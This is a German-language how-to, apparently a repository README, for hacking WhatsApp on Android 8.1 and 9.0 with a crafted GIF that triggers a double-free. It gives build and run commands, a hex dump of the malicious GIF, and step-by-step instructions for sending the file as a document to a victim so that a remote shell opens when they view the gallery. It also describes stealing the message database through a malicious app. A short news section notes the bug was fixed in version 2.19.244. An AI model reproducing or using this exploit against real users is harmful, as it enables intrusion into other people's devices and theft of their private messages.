
Programm zum Hacken von WhatsApp mittels Gif, das einen Exploit mit dem Port erstellt.
Die Adresse von system() und das Gadget müssen durch die tatsächliche Adresse ersetzt werden, die durch eine Information-Disclosure-Schwachstelle gefunden wurde.
Nach dem Ersetzen der system()-Adresse und des Gadgets führen Sie den Code aus, um die bösartige GIF-Datei zu erzeugen:
notroot@osboxes:~/Desktop/gif$ make
.....
.....
.....
notroot@osboxes:~/Desktop/gif$ ./exploit exploit.gif
buffer = 0x7ffc586cd8b0 size = 266
47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0
C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40
C4 C8 21 C3 45 0C 1B 38 5C C8 70 71 43 06 08 1A
34 68 D0 00 C1 07 C4 1C 34 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00
00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
18 00 0A 00 0F 00 01 00 00 3B
Dann kopieren Sie die Datei exploit.gif und senden Sie sie als Dokument über WhatsApp an einen anderen WhatsApp-Benutzer. Beachten Sie, dass sie nicht als Multimedia-Datei gesendet werden darf, andernfalls versucht WhatsApp, sie vor dem Senden in ein MP4 zu konvertieren. Sobald der Benutzer die bösartige GIF-Datei empfängt, passiert nichts, bis der Benutzer die WhatsApp-Galerie öffnet, um eine Multimedia-Datei an seinen Freund zu senden.
#Anweisungen
WhatsApp-GIF-Angriffsvektoren (Mini-News und Anweisungen am Ende)
-----Mini-News und ANWEISUNGEN----
Der WhatsApp-GIF-Hack kann auf zwei Arten ausgeführt werden
Stufe der lokalen Privilegien (von einer Benutzer-App zu WhatsApp): Eine bösartige App wird auf dem Android-Gerät installiert. Die App sammelt Adressen von Zygote-Bibliotheken und erstellt eine bösartige GIF-Datei, die zur Codeausführung in WhatsApp führt. Dadurch kann die Malware-App Dateien aus der WhatsApp-Sandbox stehlen, einschließlich der Nachrichtendatenbank. Remote-Codeausführung: Kopplung mit einer App, die eine Schwachstelle zur Offenlegung von Remote-Speicherinformationen aufweist. Der Angreifer kann die Adressen der Zygote-Bibliotheken sammeln und eine bösartige GIF-Datei erstellen, um sie dem Benutzer über WhatsApp zu senden (muss als Anhang gesendet werden, nicht als Bild über den Galerie-Auswähler, da WhatsApp versucht, Multimedia-Dateien in MP4 zu konvertieren, was Ihr bösartiges GIF nutzlos machen würde). Sobald der Benutzer die Galerieansicht in WhatsApp öffnet, aktiviert die GIF-Datei eine Remote-Shell im Kontext von WhatsApp. Lesen Sie unbedingt: 4 Fitbit-Hacks, die Sie nie zuvor kannten WhatsApp auf dem neuesten Android ist hackbar Die Android-Versionen 8.1 und 9.0 sind ausnutzbar, während frühere Versionen es nicht sind. Der Forscher sagt, dass der Double-Free-Fehler auch auf älteren Betriebssystemversionen ausgelöst werden könnte, aber ein Absturz erfolgt, bevor bösartiger Code zur Ausführung eines RCE ausgeführt werden kann. Bösartiges GIF, das WhatsApp hackt Fazit: Facebook hat das Sicherheitsproblem erkannt und das Problem in WhatsApp Version 2.19.244 behoben. Obwohl Facebook versuchte, es so aussehen zu lassen, als sei es kein großer Exploit, ist es in Wirklichkeit ziemlich unangenehm. Wie immer: Halten Sie Ihre Apps auf dem neuesten Stand und installieren Sie keine unnötigen Apps.
--------------------------------------------------------Schritte---------------------------------------------------------------------------
Kompilieren Sie einfach den Code in diesem Repository. Die Adresse von system() und das Gadget müssen durch die tatsächliche Adresse ersetzt werden, die durch eine Information-Disclosure-Schwachstelle gefunden wurde, die Sie selbst mithilfe anderer Techniken entdecken müssen, bevor das GIF irgendeinen RCE für Sie ausführt. Sobald Sie den Code aus dem obigen Link kompiliert haben, kopieren Sie den Inhalt in eine GIF-Datei und senden Sie sie als Dokument über WhatsApp an einen anderen WhatsApp-Benutzer. Denken Sie daran, sie nicht als Multimedia-Datei zu senden, andernfalls versucht WhatsApp, sie vor dem Senden in ein MP4 zu konvertieren. Sobald der Benutzer die bösartige GIF-Datei empfängt, passiert nichts, bis der Benutzer die WhatsApp-Galerie öffnet, um eine Multimedia-Datei an seinen Freund zu senden.